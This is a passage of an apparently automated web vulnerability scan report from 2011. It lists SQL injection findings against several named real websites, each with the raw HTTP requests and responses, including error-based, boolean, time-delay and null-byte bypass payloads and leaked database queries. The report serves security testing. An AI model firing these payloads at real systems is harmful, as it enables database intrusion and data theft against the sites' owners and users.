fieldset{padding:0 15px 10px 15px;}
.summary-container fieldset{padding-bottom:5px;margin-top:4px;}
legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;}
legend{color:#333333;padding:4px 15px 4px 10px;margin:4px 0 8px -12px;_margin-top:0px;
border-top:1px solid #EDEDED;border-left:1px solid #EDEDED;border-right:1px solid #969696;
border-bottom:1px solid #969696;background:#E7ECF0;font-weight:bold;font-size:1em;}
a:link,a:visited{color:#007EFF;font-weight:bold;}
a:hover{text-decoration:none;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;}
h4{font-size:1.2em;margin:10px 0 5px 0;
}#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif;
color:#FFF;background-color:#5C87B2;
}#content{margin:0 0 0 2%;position:relative;}
.summary-container,.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
.config_source{background:#fff5c4;}
.content-container p{margin:0 0 10px 0;
}#details-left{width:35%;float:left;margin-right:2%;
}#details-right{width:63%;float:left;
}#server_version{width:96%;_height:1px;min-height:1px;margin:0 0 5px 0;padding:11px 2% 8px 2%;color:#FFFFFF;
background-color:#5A7FA5;border-bottom:1px solid #C1CFDD;border-top:1px solid #4A6C8E;font-weight:normal;
font-size:1em;color:#FFF
...[SNIP]...
1.23. http://outils.icor.b2f-concept.net/newsletter/inscription_newsletter.php [org_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://outils.icor.b2f-concept.net
Path:   /newsletter/inscription_newsletter.php

Issue detail

The org_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the org_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /newsletter/inscription_newsletter.php?org_id=4'&crit_id=1&lan_code=FR HTTP/1.1
Host: outils.icor.b2f-concept.net
Proxy-Connection: keep-alive
Referer: http://www.b2f-concept.com/KERNEL/?NODE_ID=59521607-FF21-43C6-8C1B-18C29BB87C78&DB=CLT3&U=DC5AB262-634F-422B-9D27-B7BC29A08D03
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:45:01 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Content-Length: 1125

<br />
<b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/web/outils.icor.b2f-concept.net/htdocs/newsletter/inscription_newsletter.php</b> on line <b>3
...[SNIP]...
1.24. http://parkcitytrips.com/booking_results.php [cloneID parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://parkcitytrips.com
Path:   /booking_results.php

Issue detail

The cloneID parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the cloneID parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /booking_results.php?cloneID=41%20and%201%3d1--%20&rooms=1&nights=1&group_id=(select+1+and+row(1,1 HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 200 OK
Date: Fri, 18 Mar 2011 15:44:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1717
Content-Type: text/html; charset=UTF-8
Cache-control: private
Set-Cookie: PHPSESSID=8ecd7vt2ql9krmdaujm3fog0c4; path=/
Set-Cookie: SERVERID=i-07d1a66e; path=/
Connection: close


Error: A problem was encountered while executing the query <i>SELECT DISTINCT e.id as eventID, e.title, e.url, e.phone_1, e.phone_2, e.pic_fileName, e.smallDescription, e.latitude, e.longitude, e.inTrips, e.inBooking, e.inCalendar, e.inListing, e.inMap, e.geolocationString, ecat.start_Date, ecat.end_Date, erc.rating_category_id, sum(if(ev.field_id = 3, 1, 0)) as jrs_client, e.hide_image, e.hide_amenities, e.use_min_stay_field, e.large_image, e.zipcode, if(e.sort_rating is null,100,e.sort_rating) as sort_rating , et.title as localTitle, et.description as localDescription from events as e left join event_translations as et on e.id = et.event_id and et.locale = 'en' left join events_values as ev on e.id = ev.event_id left join events_rating_categories as erc on e.id = erc.event_id join events_categories as ecat on e.id = ecat.event_id and ecat.cat_id = 103 join events_clones as ecl on e.id = ecl.event_id and ecl.clone_id = 41 and 1=1-- where e.id in (1383,1384,1385,1386,1387,1388,1389,1390,1393,1394,1395,1396,1398,1399,1400,1401,1403,1405,1407,1410,1411,1413,1414,1415,1416,1418,1419,1421,1422,1423,1424,1425,1426,1427,1428,1429,1430,1431,1432,1434,1435,1436,1437,1438,1439,1441,1443,1448,1449,1450,1452,1453,1455,1456,1460,1462,1472,1492,1493,1494,1495,1496,1504,1505,1511,1570,1572,1573,1577,1579,1580,1730,1732,2578,7369,37578,37579,37580,37642,38674,41699,42689,42865) and ecat.start_Date <= '2011-03-24' and ecat.end_Date >= '2011-03-23' and ecat.inactiveDate = '0000-00-00' and ecl.inactiveDate = '0000-00-00' and e.inactive != 1 group by e.id ORDER BY position, title</i> Mixing of GROUP columns (MIN(),MAX(),COUNT(),...) with no GROUP columns is illegal if there is no GROUP BY clause

Request 2

GET /booking_results.php?cloneID=41%20and%201%3d2--%20&rooms=1&nights=1&group_id=(select+1+and+row(1,1 HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.0 200 OK
Date: Fri, 18 Mar 2011 15:44:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 314
Content-Type: text/html; charset=UTF-8
Cache-control: private
Set-Cookie: PHPSESSID=tobacig975l4ofd4v9ppm4sns5; path=/
Set-Cookie: SERVERID=i-07d1a66e; path=/
Connection: close


Error: A problem was encountered while executing the query <i>SELECT g.id, g.group_id, g.map_config FROM groups_config g WHERE g.group_id = (select 1 and row(1,1</i> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
1.25. http://parkcitytrips.com/booking_results.php [cloneID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://parkcitytrips.com
Path:   /booking_results.php

Issue detail

The cloneID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the cloneID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /booking_results.php?cloneID=41'&rooms=1&nights=1&group_id=(select+1+and+row(1,1)%3E(select+count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),(SELECT%20now()),CHAR(95),CHAR(33),CHAR(64)),0x3a,floor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 18 Mar 2011 15:44:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 276
Content-Type: text/html; charset=UTF-8
Cache-control: private
Set-Cookie: PHPSESSID=gpc5j0u3qh0ufe2mhm4g0kuap4; path=/
Set-Cookie: SERVERID=i-07d1a66e; path=/
Connection: close

Error: A problem was encountered while executing the query <i>SELECT template_path,template_style FROM clones WHERE id = 41'</i> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
1.26. http://parkcitytrips.com/booking_results.php [group_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://parkcitytrips.com
Path:   /booking_results.php

Issue detail

The group_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the group_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /booking_results.php?cloneID=41&rooms=1&nights=1&group_id=(select+1+and+row(1,1)%3E(select+count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),(SELECT%20now()),CHAR(95),CHAR(33),CHAR(64)),0x3a,floor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))' HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 18 Mar 2011 15:44:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 494
Content-Type: text/html; charset=UTF-8
Cache-control: private
Set-Cookie: PHPSESSID=r8nt2v1srok2onauc5d1hqg0t0; path=/
Set-Cookie: SERVERID=i-f3d4a39a; path=/
Connection: close


Error: A problem was encountered while executing the query <i>SELECT g.id, g.group_id, g.map_config FROM groups_config g WHERE g.group_id = (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR
...[SNIP]...
</i> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
1.27. http://parkcitytrips.com/booking_results.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://parkcitytrips.com
Path:   /booking_results.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /booking_results.php?cloneID=41&rooms=1&nights=1&group_id=(select+1+and+row(1,1)%3E(select+count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),(SELECT%20now()),CHAR(95),CHAR(33),CHAR(64)),0x3a,floor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit/1'+1)) HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 18 Mar 2011 15:44:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 502
Content-Type: text/html; charset=UTF-8
Cache-control: private
Set-Cookie: PHPSESSID=q8vq0crnhoo9ce34trlmde7pa4; path=/
Set-Cookie: SERVERID=i-f3d4a39a; path=/
Connection: close


Error: A problem was encountered while executing the query <i>SELECT g.id, g.group_id, g.map_config FROM groups_config g WHERE g.group_id = (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR
...[SNIP]...
</i> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/1' 1))' at line 1
1.28. http://pixel.yola.com/LoggingAgent/LoggingAgent [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://pixel.yola.com
Path:   /LoggingAgent/LoggingAgent

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /LoggingAgent/LoggingAgent?url=//antifung.yolasite.com/&pagename=index&siteid=8a4986cb2dc8c27e012dcd5a0c3a4596&resolution=1920x1200&colorDepth=16&flash=1&java=1&sitereferer=&visitorId=C4A762FB-9ED0-0001-2F15-1374B3C317AE&visitId=C4A762FB-9EE0-0001-23F0-168637A01F71&LoggingAgentReturnType=script HTTP/1.1
Host: pixel.yola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Length: 2557
Date: Fri, 18 Mar 2011 15:44:33 GMT
X-Varnish: 842362907
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: Coyote-2-ac9068e=ac906e9:0; path=/

<html><head><title>JBossWeb/2.0.1.GA - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-se
...[SNIP]...
</b> Exception report</p>
...[SNIP]...
<u>The full stack trace of the root cause is available in the JBossWeb/2.0.1.GA logs.</u>
...[SNIP]...

Request 2

GET /LoggingAgent/LoggingAgent?url=//antifung.yolasite.com/&pagename=index&siteid=8a4986cb2dc8c27e012dcd5a0c3a4596&resolution=1920x1200&colorDepth=16&flash=1&java=1&sitereferer=&visitorId=C4A762FB-9ED0-0001-2F15-1374B3C317AE&visitId=C4A762FB-9EE0-0001-23F0-168637A01F71&LoggingAgentReturnType=script HTTP/1.1
Host: pixel.yola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript;charset=ISO-8859-1
Content-Length: 18
Date: Fri, 18 Mar 2011 15:44:33 GMT
X-Varnish: 842362925
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: Coyote-2-ac9068e=ac906e9:0; path=/

//logged by Abacus
1.29. http://pixel.yola.com/LoggingAgent/LoggingAgent [sitereferer parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://pixel.yola.com
Path:   /LoggingAgent/LoggingAgent

Issue detail

The sitereferer parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sitereferer parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /LoggingAgent/LoggingAgent?url=//antifung.yolasite.com/&pagename=index&siteid=8a4986cb2dc8c27e012dcd5a0c3a4596&resolution=1920x1200&colorDepth=16&flash=1&java=1&sitereferer='&visitorId=C4A762FB-9ED0-0001-2F15-1374B3C317AE&visitId=C4A762FB-9EE0-0001-23F0-168637A01F71&LoggingAgentReturnType=script HTTP/1.1
Host: pixel.yola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Length: 2557
Date: Fri, 18 Mar 2011 15:44:26 GMT
X-Varnish: 1748272546
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: Coyote-2-ac9068e=ac90680:0; path=/

<html><head><title>JBossWeb/2.0.1.GA - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-se
...[SNIP]...
</b> Exception report</p>
...[SNIP]...
<u>The full stack trace of the root cause is available in the JBossWeb/2.0.1.GA logs.</u>
...[SNIP]...

Request 2

GET /LoggingAgent/LoggingAgent?url=//antifung.yolasite.com/&pagename=index&siteid=8a4986cb2dc8c27e012dcd5a0c3a4596&resolution=1920x1200&colorDepth=16&flash=1&java=1&sitereferer=''&visitorId=C4A762FB-9ED0-0001-2F15-1374B3C317AE&visitId=C4A762FB-9EE0-0001-23F0-168637A01F71&LoggingAgentReturnType=script HTTP/1.1
Host: pixel.yola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript;charset=ISO-8859-1
Content-Length: 18
Date: Fri, 18 Mar 2011 15:44:26 GMT
X-Varnish: 842362296
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: Coyote-2-ac9068e=ac906e9:0; path=/

//logged by Abacus
1.30. http://thethrottle.com/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://thethrottle.com
Path:   /

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /?a53db%22%3E%3Cscript%3Ealert(1)%3C/script%3Eb17cf9c91cc=1 HTTP/1.1
Host: thethrottle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Mar 2011 15:57:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://thethrottle.com/xmlrpc.php
Link: <http://wp.me/VeJh>; rel=shortlink
Content-Length: 115332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
   <head profile
...[SNIP]...
<a href="http://thethrottle.com/2010/09/28/if-youre-going-to-fail-fail-all-the-way-video/">
...[SNIP]...

Request 2

GET /?a53db%22%3E%3Cscript%3Ealert(1)%3C/script%3Eb17cf9c91cc=1 HTTP/1.1
Host: thethrottle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Mar 2011 15:57:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://thethrottle.com/xmlrpc.php
Link: <http://wp.me/VeJh>; rel=shortlink
Content-Length: 115726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
   <head profile
...[SNIP]...
1.31. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1;WAITFOR%20DELAY%20%270:0:25%27--&syndicationOutletId=47146&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725
Referer: http://www.google.com/search?hl=en&q='

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Fri, 25 Mar 2011 16:34:31 GMT
Expires: Fri, 25 Mar 2011 16:34:06 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSCABADAA=CPIKIJBCPNPHGPCNGDNOHABO; path=/
X-Powered-By: ASP.NET
Content-Length: 885
Connection: keep-alive

<br>Error Description:Procedure or function 'Track_BannerCreativeImpression_V.1' expects parameter '@campaignId', which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1;WAITFO
...[SNIP]...
1.32. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the User-Agent HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1;WAITFOR%20DELAY%20%270:0:25%27--&syndicationOutletId=47146&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16'
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Fri, 25 Mar 2011 16:32:41 GMT
Expires: Fri, 25 Mar 2011 16:32:16 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSABBBCDC=CENICLBCPFEOEFKODNPHPFGF; path=/
X-Powered-By: ASP.NET
Content-Length: 794
Connection: keep-alive

<br>Error Description:Procedure or function 'Track_BannerCreativeImpression_V.1' expects parameter '@campaignId', which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1;WAITFO
...[SNIP]...
1.33. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [VINDICOAUDIENCEISSUEDIDENTITY cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The VINDICOAUDIENCEISSUEDIDENTITY cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the VINDICOAUDIENCEISSUEDIDENTITY cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1;WAITFOR%20DELAY%20%270:0:25%27--&syndicationOutletId=47146&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39'; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Fri, 25 Mar 2011 16:28:23 GMT
Expires: Fri, 25 Mar 2011 16:27:58 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCQSTDSCC=LLGBOPBCABLANADHCGKMELKI; path=/
X-Powered-By: ASP.NET
Content-Length: 793
Connection: keep-alive

<br>Error Description:Procedure or function 'Track_BannerCreativeImpression_V.1' expects parameter '@campaignId', which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1;WAITFO
...[SNIP]...
1.34. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [__qca cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The __qca cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the __qca cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1;WAITFOR%20DELAY%20%270:0:25%27--&syndicationOutletId=47146&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725'

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Fri, 25 Mar 2011 16:30:07 GMT
Expires: Fri, 25 Mar 2011 16:29:43 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAQAABCCA=COBACMBCNLHPKCJFGDBOCHFG; path=/
X-Powered-By: ASP.NET
Content-Length: 793
Connection: keep-alive

<br>Error Description:Procedure or function 'Track_BannerCreativeImpression_V.1' expects parameter '@campaignId', which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1;WAITFO
...[SNIP]...
1.35. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [adRotationId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The adRotationId parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the adRotationId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

